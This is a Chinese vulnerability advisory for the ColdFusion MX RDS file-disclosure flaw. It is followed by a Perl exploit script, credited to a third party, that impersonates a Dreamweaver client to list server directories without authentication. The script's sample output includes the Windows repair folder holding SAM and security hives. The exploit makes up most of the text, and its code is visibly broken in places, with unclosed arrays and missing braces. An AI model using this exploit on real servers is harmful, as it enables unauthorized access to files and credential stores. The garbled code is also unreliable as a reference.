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Macromedia ColdFusion MX远程开发服务文件泄露漏洞


Macromedia ColdFusion Server MX Professional
Macromedia ColdFusion Server MX Enterprise
Macromedia ColdFusion Server MX Developer
Macromedia ColdFusion Server MX 6.0

Macromedia ColdFusion MX Server是一款强大的WEB应用服务程序,可以自动建立站点和WEB应用程序。

ColdFusion MX的RDS服务存在漏洞,远程攻击者可以利用这个漏洞未授权访问服务器上的数据,造成文件信息泄露。

ColdFusion RDS允许开发者安全的访问远程文件和数据资源,及调试CFML代码。开发者可以使用RDS通过ColdFusion Studio、Homesite+和Dreamweaver MX访问远程开发服务器上的文件和数据库。在CFMX下,RDS是运行在CF应用服务帐户上下文的Java Servlet。如果正确配置RDS,则需要密码来验证远程的开发者访问。由于在与ColdFusion MX服务器通信时验证过程中存在问题,可导致远程用户重新配置开发服务器上属性,并用来访问服务器上的文件。

<*来源:rs2112 (rs2112@hushmail.com


警 告


Victim1 <victim1@angrypacket.com>提供了如下测试方法:

# RDS_c_Dump.pl
# victim1@angrypacket.com

## BIG NOTE -> aka ( DISCLAIMER ): if you do something retarded with this code or modification of this code you are completely on your OWN,
# I or rs2112 take no responsibilty for your stupid actions, A JUST BE KNOWN ! This is meant for administrators to protect themselves against
# attack and thats it.

## CF 6 MX Server does several things in order to get remote dir structure so we will need
# to recreate these functions. This is a "almost" complete emulation of a dreamweaver client connection just FYI,
# in like one full HTTP1/1 session witin netcat.
# I would like to point out that the ASPSESSID never validates so you can change this on the fly.
# Also I would like to say Macromedia's phone support sucks ass, I called trying to be a nice guy ( to follow up on email ) and
# they attempted to belittle my intelligence on the phone.. . OH and yes I did email them several times with no response.
# You can Write as well, I have tested and this works fine. If you change the file to and *.exe it will attempt to become and
# 16bit dos application on the remote box FYI.
# Requests are sent in this order to get a remote dir structure:
# NOTE: Create dir retrieval array.
# Due to certian current situations I am not allowed to release full exploit code with ( READ, RETRIEVE, WRITE ) functions, I have fully working code,
# If you email me I will not send it to you, so basically dont bother.
# Im sorry for being such a foil fart but hey, you understand im shure.
# Sample output:
# --------------------------------
# Vic7im1@cipher:~/Scripts/RDS_Sploit$ perl RDS_c_Dump.pl
# POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1
# Request String Value: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:
# Content-Length: 37
# Please wait.. ..
# HTTP/1.1 100 Continue
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# HTTP/1.1 200 OK
# Server: Microsoft-IIS/5.0
# Date: Tue, 01 Jul 2003 10:30:43 GMT
# Connection: close
# Content-Type: text/html
# 50:2:F:11:autoexec.nt1:63:4383:0,02:F:9:config.nt1:64:25773:0,02:F:7:default1:66:1187843:0,02:F:10:ntuser.dat1:66:1187843:0,02:F:3:
# sam1:65:204803:0,02:F:12:secsetup.inf1:66:5735303:0,02:F:8:security1:65:286723:0,02:F:9:setup.log1:66:1551943:0,02:F:8:
# software1:67:65331203:0,02:F:6:system1:66:9748483:0,0
# Vic7im1@cipher:~/Scripts/RDS_Sploit$
# ----------------------------------

use strict;
use IO::Socket;

use vars qw($response @clength @rarray);

## Dreamweaver string requests to ide.cfm
## --------------------------------------
#1:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#2:  3:STR:7:C:/_mm/STR:1:*STR:0:                      Content-Length: 28
#3:  3:STR:6:C:/_mmSTR:9:ExistenceSTR:0:STR:0:STR:0:           Content-Length: 47
#4:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#5:  3:STR:10:C:/_notes/STR:1:*STR:0:                      Content-Length: 32
#6:  5:STR:9:C:/_notesSTR:9:ExistenceSTR:0:STR:0:STR:0         Content-Length: 50
#7:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:            Content-Length: 46
#8:  5:STR:12:C:/XYIZNWSK/STR:6:CreateSTR:0:STR:0:STR:0:     Content-Length: 51
#9:  3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#10: 3:STR:3:C:/STR:1:*STR:0:                    Content-Length: 24
#11: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#12: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:    Content-Length: 53
#13: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#14: 5:STR:11:C:/XYIZNWSKSTR:9:ExistenceSTR:0:STR:0:STR:0:    Content-Length: 53
#15: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#16: 5:STR:11:C:/XYIZNWSKSTR:6:RemoveSTR:0:STR:0:DSTR:0:    Content-Length: 51
#17: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#18: 3:STR:8:C:/WINNTSTR:1:*STR*STR:0:                Content-Length: 29
#19: 3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:        Content-Length: 46
#20: 3:STR:15:C:/WINNT/repairSTR:1:*STR:0:            Content-Length: 37

# Static Content-Lenght: $string_val if you plan on leaving C:\WINNT\repair you will need to know
# the $string_val.
@clength = ( "Content-Length: 46",
         "Content-Length: 28",
         "Content-Length: 47",
         "Content-Length: 46",
                #"Content-Length: 32",
         #"Content-Length: 50",
         "Content-Length: 46",
         "Content-Length: 51",
         "Content-Length: 46",
         "Content-Length: 24",
         "Content-Length: 46",
         "Content-Length: 53",
         "Content-Length: 46",
         "Content-Length: 53",
         "Content-Length: 46",
         "Content-Length: 51",
         "Content-Length: 46",
         "Content-Length: 29",
         "Content-Length: 46",
         "Content-Length: 37"

@rarray = ( "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",
        "3:STR:14:ConfigurationsSTR:10:6, 0, 0, 0STR:0:",

# change target addy below.
my $TARGET = "";
my $PORT = "80";
my $STRING = "C:/WINNT/repair";
my $POST = "POST /CFIDE/main/ide.cfm?CFSRV=IDE&ACTION=BrowseDir_Studio HTTP/1.1\r\n";

print "Generating Socket with Array Directory Values.\n";
my ( $i, $c);
for ( $i = 0; $i < @rarray; $i++  ) {
    for ( $c = 0; $c < @clength; $c++ ) {    
            if( $i == $c ) {
            &gen_sock($TARGET, $PORT, $rarray[$i], $clength[$c]);

sub gen_sock() {
    my $sock = new IO::Socket::INET(PeerAddr => $TARGET,
                    PeerPort => $PORT,
                    Proto     => 'tcp',
    die "Socket Could not be established ! $!" unless $sock;
    print "Target: $TARGET:$PORT\n";
    print "$POST\n";
    print "Request String Value: $rarray[$i]\n";
    print "$clength[$c]\n";
    print "Please wait.. ..\n";
    print $sock "$POST";
    print $sock "Content-Type: application/x-ColdFusionIDE\r\n";
    print $sock "User-Agent: Dreamweaver-RDS-SCM1.00\r\n";
    print $sock "Host: $TARGET\r\n";
    print $sock "$clength[$c]\r\n";
    print $sock "Connection: Keep-Alive\r\n";
    print $sock "Cache-Control: no-cache\r\n";
    print $sock "\r\n";
    print $sock "$rarray[$i]";
    # lets return and print data to term
    while($response = <$sock>) {
        print "$response\n";

+----------- -- -
+ disclaimer
+-------- -- -

Oh and Happy 4th of July !
- -- -------------------------




